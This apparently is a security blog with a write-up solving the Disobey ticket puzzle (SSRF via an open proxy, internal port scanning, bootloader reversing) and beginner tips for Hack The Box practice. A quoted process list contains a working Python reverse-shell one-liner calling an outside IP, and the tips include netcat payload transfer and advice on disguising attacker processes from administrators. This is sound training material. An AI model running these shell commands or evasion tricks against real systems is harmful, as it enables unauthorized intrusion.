Spoiler alert

WARNING: This obviously CONTAINS SPOILERS. Do not read further if you want to solve it yourself! And you should try (harder)!

It began with the URL http://puzzle.disobey.fi/.

Quick recon

First thing I’m used to doing is recon with nmap

nmap -v -sC -sV -oA initial_nmap puzzle.disobey.fi

This quickly revealed two webservers. The other one only replied “Try harder”, a good tip indeed.
The other one had a standard nginx web page.

HTML source for the test page reveals there’s a resource lorem.html . So I downloaded that, but what to do with the seemingly standard “lorem ipsum” stuff?
At the same time, my standard approach to HackTheBox is to crawl for additional hidden resources left “accidentally” in the web server. So nikto + dirb + gobuster it is.
My normal HTB enumerator uses Kali linux standard lists and some additional ones from the SecLists.
https://gist.github.com/lokori/3ba0a98ab9cf9f1b17f83151295c666a
This crawling revealed .bash_history which lead to an SQL file, but that didn’t lead to  anything interesting.
So, back to lorem.html. With this kind of puzzle it’s important to remember that everything is not relevant to the solution, but the relevant hints and resources are provided in the puzzle. I need to remind myself of that when I get stuck.

lorem lorem lorem

Cut it into separate words.

cat pier.sh
#!/bin/bash
for word in $(<lorem.html)
do
echo “$word”
done
./pier.sh < lorem.html | sed s/[\.,]//g|sort|uniq > lorems.txt

and then

cat lorems.txt |xargs -I {} curl -O ‘http://puzzle.disobey.fi/{}’

Now we get

ls -laS
-rw-r–r– 1 root root 3650 Aug 2 09:08 vulputate
-rw-r–r– 1 root root 1421 Aug 2 09:07 lorems.txt
-rw-r–r– 1 root root 11 Aug 2 09:08 Interdum

Okay.. clearly one reply is very different!
It says: “Wrong vhost”
ok, so let’s curl again with another vhost?

curl –header ‘Host: julli.disobey.fi’ http://puzzle.disobey.fi/Interdum
Try harder – admin

So this seems kind of promising, but what is the proper virtual host?
Not one of these.

cat lorems.txt |xargs -I {} curl -o {} –header ‘Host: {}.disobey.fi’ ‘http://puzzle.disobey.fi/Interdum’

It took a while, but the answer was not very complicated after all.

curl –header ‘Host: admin’ http://puzzle.disobey.fi/Interdum
Greetings! Love you <3 – I need -love also

Okay, let’s make some “-love” then..

curl –header ‘Host: admin’ http://puzzle.disobey.fi/Interdum-love

Secrets

Now we find a nice text file.

cat secret.txt
Hi John!
Here is that secret email – encrypted with your favorite PIN-code!
SnVzdCBraWRkaW5nIC0gYmFzZTY0IGlzIGF3ZXNvbWUu

Base64 decode says “Just kidding – base64 is awesome.”
Heh. Hah. Hoh. We still have test.php there. It is a small file so it can’t be very complicated to exploit it and it’s the only lead we have now.
Perhaps there is a parameter that is exploitable, but what is the parameter name?  There is wfuzz, but let’s be old school.

cat /root/tools/SecLists/Discovery/DNS/namelist.txt |xargs -I {} curl –header ‘Host: admin’ ‘http://puzzle.disobey.fi/Interdum-love/test.php?{}=123’

Still no luck. At this point I was very frustrated and angry at myself.

Black hat Python

When I get frustrated in this way I usually write some Python to take full control of the issue. So, I wrote this one-time piece.

This tries sufficiently different values for each parameter name candidate. Given the proper word lists this finally found the parameter name, which was simply “url”.
How to exploit that?
Randomly trying some numbers.

curl -v –header ‘Host: admin’ ‘http://puzzle.disobey.fi/Interdum-love/test.php?url=1234561251’* Trying 185.86.149.26…

Resulted in “504 Gateway Time-out”. Hmm.

curl -v –header ‘Host: admin’ ‘http://puzzle.disobey.fi/Interdum-love/test.php?url=213070643/index.html’

Gave out ” HTTP/1.1 403 WAF”.
It’s a HTTP proxy! The numbers in the URL can be translated into IP addresses which enables us proxy GET requests. Let’s try the other web server in the puzzle machine through this (as the call comes from the localhost, it might behave differently):

curl –header ‘Host: admin’ ‘http://puzzle.disobey.fi/Interdum-love/test.php?url=0:8021%2f2’

And in fact, it does! There is a one character different in the reply “Try harder!1” vs. “Try harder!” but this doesn’t lead to anything interesting.

Proxy as a port scanner

This is one of the standard tricks – if there is an open proxy, it can be used to scan the internal network for ports and services not directly accessible from the outside. Let’s go!
Very crude scanner in Python.

We find SSH server and.. finally, something very interesting came up!

FOUND !! 0:40053 // 51
H4sIAI5uYVsAA+3STUgUURwA8Oe2OyyGHyF4qMtb6KAXm+eubq7rmq5bFuWaHxGWyrrO5ObuzjI7Yx+o+47mQTp16rRHE9HwEBjjhjVUsBHdqktQxtQgSpgHE+utRkGEdBEJ/j8Y3vzn//HewOuTJCUqhfoFGe0ZnuerXS6cW93VVdsrX7kTM4QnboKJ0+nkK6vdlTzBPHHyLjfC/N4d6Tc1qYRkdpRBV4zsVsfKRHGX/M7P4F/rf+KzbRihzY2x0vYUyZC35Bl5RdbJd7L8EA1PvJzITLybML7No9FxVsAv8+uzlgUbmrPMHMiWyHalZDZv64m5zH/IlgTVj9rVlPHe8ule3n7/FPhHnZMiyYi1HJJN28pGVHeszmDroXQN9XAeqqDoVibtoSZq17la6tQ5L60wLV36NJ+xYmtxuo6lVnXORyvS9VTnTuSy01svrLZ0AwsbqUfn/PS4zjVRXucCtFLnTlKyUEONFqT1poznSBtNGY/RwlFq3ETU56IN6jHqq6J+tYz6qmmj6qA+N21SD2v3U8ZdpLG6O0hzUOM20t6kjHG0saYtpYwEoiMWp+rUAxY3HbETpVwP2IkeKKzXA0V1P2/1umaj80XIP+VFir3s6dajsTzzy+KDFW1jbQ5lS7125aC3QDkyV5gtnjSXgzq75IUz9mzxDGYPW83XLC5g7/nZ4sXOW0sXtI6UYUc9hpWdwtycsmcULtdsfl1ElxzduLWh5bQfozZJVQQcbM8vQE2R5CCWhVA/FkORqNDvYN9aZen6DZwU5CFBxoqE1aSARUnGoqCEByLxK1hklUlcJiWUiBQPRcs9GPmleFwI5+JcRywiy7mG7ZF4KBLCidxMVtcciipsRAXbJsjGi1HpGi7zDwjhwaQaY33JWIhtUo5Z/tSZi83hs8HucwPnO/raYpc7E73RZKS3K9wTRyz9pwZ/Y9M+XFYAAAAAAAAAAAAAAAAAAAAAAAAAAPAXPwDTbo0GACgAAA==1

So what is this?

cat pokale.txt | base64 -d > pokale.bin
file pokale.bin
pokale.bin: gzip compressed data, last modified: Wed Aug 1 08:25:50 2018, from Unix

Ok, so a zip file. Our next step obviously.

Mystery binary

First standard thing is to run strings.

bootloader
000644
000765
000024
00000010171 13330267201 013047
ustar
00k4m1
staff
000000
000000
[!] PANIC
Route OS
Disk read failed!
Proxy server to use for fetching files (optional):
Connection to mirror failed via proxy:
Halting.
Overflow (Checksum mismatch)
GJXHcLO]MhQTbRm\Up_lsi_Zc^n
ACBD

So a bootloader, but two strings are interesting. “00k4m1” means the great k4m1 has signed this binary! In the end, “GJXHcLO]MhQTbRm\Up_lsi_Zc^n” is very likely a decryption key or some secret we have to dissect.
Let’s try a shortcut.

Sometimes we could be lucky, but not today. So let’s look at the binary, properly.
There is nothing wrong with radare2 but I used IDA free in the end. I didn’t actually run the bootloader code at all. I just analyzed it and figured out what it does without stepping and debugging. The initial guess was correct – we need to decrypt the weird string, but it just wasn’t simple XOR.

Replicating the “decryption” algorithm in Python we get something sensible out of it:

The binary also points towards the other web server we found with the nmap so clearly we need to do something there, but there is no clear URL that gives us the ticket.

Alternate solution to binary

This is from another ROT member, Jarkko Vesiluoma:

cat something.base64 |base64 -d > bootloader.gz
$ file ../bootloader2
../bootloader2: gzip compressed data, last modified: Wed Aug 1 08:25:50 2018, from Unix
$ file bootloader.raw
bootloader.raw: DOS/MBR boot sector
qemu-system-x86_64 -k fi -drive format=raw,file=bootloader.raw -s
other terminal: r2 -D gdb gdb://localhost:1234
In r2: vvv and then qq

Basically the memory of the running bootloader is accessed to get the decrypted value. It’s running inside a virtual machine so this is easy. In a way this is “cheating”, but this is a nice way to analyze an unknown binary, as long as potentially harmful actions are contained inside the virtual machine.

The final insult

Manual guessing is frustrating..

Try harder!root@kali:~/disobey/test# curl –header ‘Host: 123.0.0.5’ “http://puzzle.disobey.fi:8021/?GIVE_GIVE_GIVE_ME_MY_TICKET”
Try harder!root@kali:~/disobey/test# curl –header ‘Host: 123.0.0.5’ “http://puzzle.disobey.fi:8021/?ACBD=GIVE_GIVE_GIVE_ME_MY_TICKET”
Try harder!root@kali:~/disobey/test# curl –header ‘Host: 123.0.0.5’ “http://puzzle.disobey.fi:8021/?GIVE_GIVE_GIVE_ME_MY_TICKET=ACBD”
Try harder!root@kali:~/disobey/test# curl –header ‘Host: 123.0.0.5’ “http://puzzle.disobey.fi:8021/GIVE_GIVE_GIVE_ME_MY_TICKET”

So Python it is again! I was getting really worked up at this point after all this effort. How many times do I need to “try harder” to get the ticket?

We still need to find the right parameter list, but there is a reasonable one from the SecLists at our disposal.

python final_insult.py /root/tools/SecLists/Discovery/Web_Content/burp-parameter-names.txt
using word list /root/tools/SecLists/Discovery/Web_Content/burp-parameter-names.txt
FOUND !!data
HACKER! https://holvi.com/shop/Disobey/product/c995bdab7374d27f1250f1071c4a9b07/

So finally! There is a ticket.

You could have also done it with something like this using wfuzz:

wfuzz -c -z file,Web-Content/raft-large-words.txt –filter “c=200 and h>11” -f disobey.1 -Z -H ‘Host: admin’ http://puzzle.disobey.fi:8021/?FUZZ=GIVE_GIVE_GIVE_ME_MY_TICKET

Closing words

I got really frustrated at some points during this process, but luckily I got some motivational push from other team ROT members (thank you Jarkko and Putsi). We solved this on our own, without really co-operating together, but it still helped to me to know that I’m wandering roughly to the right direction. Our solutions were different in the end as I like writing Python scripts when things get difficult. The other ROT guys are perhaps slightly more tool oriented.
I really liked the binary challenge part and overall I think the difficulty level was correct.  It wasn’t too easy to get the hacker ticket, but perfectly doable for a motivated hacker.

A week ago I started hacking virtual machines and challenges at Hackthebox.eu and it has been a lot of fun. Hack The Box provides it’s users with a virtual environment with dedicated vulnerable machines and some CTF-style challenges. This post contains some pointers and introductory tips for aspiring would-be hackers, but no spoilers and you still need to solve the invitation code.
At my day job I try to ensure that the software we produce is secure. Sometimes it involves doing penetration testing, but I’m not doing the fancy Red Teaming stuff at all. If I find technical security flaws or process issues, they are fixed and there’s rarely any public disclosure.  There might be a review and retrospective, but no one pays me to chain cool ROP gadgets to prove that a buffer overflow can be very dangerous. Now Hackthebox.eu has provided me with an excuse to do that other kind of hacking too.

How to get started?

You’ll need some basic tools. Kali Linux in a virtual machine and some HTTP proxy (Burp or ZAP) are sufficient for most of the things. Inside Kali, nmap, dirb, nikto and Metasploit have been my most useful tools so far.
To get an idea about the hacking (as well as some tips), watch IppSec’s great videos about pwning the retired machines. For example, watch the  video about pwning Popcorn.

Pwning machines

It appears that first you need to recon the machine by running nmap and dirb and other scanners to find something exploitable. Often it’s a web application, but it can be something else too. When you find “something”, try to exploit it somehow. Get some ideas about how to find & exploit that “something” from High on Coffee: penetration testing cheat sheet.
I’m not a huge fan of having to guess something artificial, but that’s not totally unrealistic. I’m not very good at that it seems, but hopefully I’ll get better. Just keep in mind, there are steps where you may need to simply guess something.

Getting from user to root

I suck at pwning Windows machines, which is something I intend to practice next, but
these links offer some ideas for the Linux/Unix systems:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://www.rebootuser.com/?p=1758
https://www.rebootuser.com/?p=1623
Of course you need to understand how Linux systems work in the first place. Crontab, file system permissions, sudo and all that other basic admin stuff.

Binary reverse engineering challenges

In order to reverse binaries in the challenges, you need some knowledge of x86 assembly. The easier ones are not really difficult, but if you can’t read assembler code, it will be quite hard.
I have tried x64dbg, Hopper, radare2, IDA (free version) and the good old OllyDbg so far. I also downloaded Binary Ninja, but haven’t really tried it yet. While I don’t want to debate the merits these tools, I have found x64dbg most to my liking so far. Gives me the same vibes I felt with the ancient Turbo Debugger about 25 years ago.
My strategy so far has been straightforward:
1. Analyze what the program actually does.
2. See if there are interesting strings inside and how they are used.
3. Try to get rid of obfuscation and anti-debugging stuff by rewriting the code.
4. Try to make sense of the remaining final checking code. (single step, breakpoints etc.)
5. Perhaps write a small Python script to reveal the flag.
Some links which might be useful:
https://www.u235.io/single-post/2017/07/23/Simplistic-Binary-Patching-With-Radare2 https://erichokanson.me/2015/04/17/reverse-engineering-with-ollydbg/
Simply replacing the annoying stuff with NOP instructions is a good starting strategy. If the state of the system (registers and flags) are not affected, this works pretty well.
Get rid of the pesky antidebugging code!

It’s not real life

I have had fun with Hack the box (as well as some frustration also), but it has been extremely interesting to peek at what other people are doing on the machines. Here are some of my findings.

Scripters are running wild

Here’s a sample of process list from one of the machines:

www-data 2555 0.0 0.3 18904 3604 ? S 10:24 0:00 /bin/bash ./LinEnum.sh -t
www-data 2556 0.0 0.3 19004 3464 ? S 10:24 0:00 /bin/bash ./LinEnum.sh -t
www-data 1428 0.0 0.0 4508 704 ? S 10:15 0:00 sh -c cd /tmp; python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket
.SOCK_STREAM);s.connect((“10.10.15.228”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’ 2>&1
www-data 1429 0.0 0.9 39980 9668 ? S 10:15 0:00 python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.
connect((“10.10.15.228”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);
www-data 1430 0.0 0.0 4508 784 ? S 10:15 0:00 /bin/sh -i
www-data 1443 0.0 1.2 256212 12588 ? S 10:15 0:00 /usr/sbin/apache2 -k start
www-data 1493 0.0 0.6 32168 6680 ? S 10:16 0:00 python -c import pty;pty.spawn(“/bin/bash”)
www-data 1494 0.0 0.3 18216 3064 pts/3 Ss 10:16 0:00 /bin/bash
www-data 1501 0.0 0.0 4508 752 ? S 10:16 0:00 sh -c cd /tmp; python -c “import pty; pty.spawn(‘/bin/bash’)” 2>&1
www-data 1502 0.0 0.6 32168 6780 ? S 10:16 0:00 python -c import pty; pty.spawn(‘/bin/bash’)

In a real system, this should light up the IDS/SIEM like a christmas tree. Even a cursory look by the administrator with ps -Af would immediately reveal that something bad is happening.
Therefore, in a real pentest (of course neither of us would do any illegal hacking), the tester would run something innocent, like testrunner.sh, which would hide the nefarious activities from immediate discovery. It would be in some obscure innocent folder or completely reside in memory. Most certainly, a professional wouldn’t upload anything named “reverse-shell.php” to the server.
Reverse shells still would show up in network connections unless masquaraded with some network magic, but that process list is just plain funny
It’s quite different also for the reverse engineering. Especially reversing unknown (potential) malware is something I would approach with extreme caution. Just single-stepping and setting breakpoints in a debugger would not be enough to contain a malicious binary.
So if you want to practice for real life scenarios, I would suggest that instead of going straight for the flag, you should practice the same precautions and steps you would need in the real world. Having fun is perfectly fine, nothing wrong with that.

Don’t get accidentally exposed!

As a first step, don’t hack with your important machine. As a minimum, shut down the VPN when not using it and use a virtual machine (or a burner machine) when you connect to a potentially hostile unknown network.
A lot of people seem to be running python -m SimpleHTTPServer or something similar to host the payloads to be downloaded by the target machine. Please consider that there are other hackers working on the same machine and if you expose your hard disk to the target machine, someone else could download something interesting from your computer. Like, say, your private ssh key. SimpleHTTPServer is super handy, but it does not care about security!
Either work with something which only allows downloading your exploit.exe or immediately shut down the server after your tools have been downloaded on the target.
Here’s a way to do it with netcat:

1. On the target, start listening:
nc -l 8080 > bash.sh
2. On your attacker machine, send your evil payload:
nc -w 3 localhost 8080 < LinEnum.sh

Whether this trick works depends on the firewall rules, but as a minimal precaution, shut down your server on your machine immediately after the file transfer.

Some final tips and ideas

Tip 1: Learn Python

Python is great for quickly cooking up some automation and helper programs. You don’t need static types or classes to structure your code. But make no mistake: Python is definitely a serious programming language and not just a “scripting language”.
Here’s an example from a script I wrote to automate guessing passwords and users for a certain service.

Tip 2: Keep notes

Keep notes on the challenges and machines. I have a subfolder for each machine with more or less incoherent notes on what I have found and what I haven’t yet figured out about the machine. I may put this stuff on a private git repository to get it better organized.

Tip 3: Use the google

This is kind of obvious, but enumerate the versions and search for possible exploits in exploit-db and other places. I precompiled some exploits already and kept the binary executables in addition to source code. I might need some sort of Excel sheet or something to keep track of these if there are more to come.

Happy hacking!

It’s worth mentioning that Hack The Box contains more than just binary reverse engineering and pwning machines. I left out advice for some challenges, like steganography, which I haven’t really done. I’m not qualified to give any advice on that.
If you now feel the itch to try out some “real” hacking, please do. The best way to learn is by doing and Hack The Box is a great platform to practice on.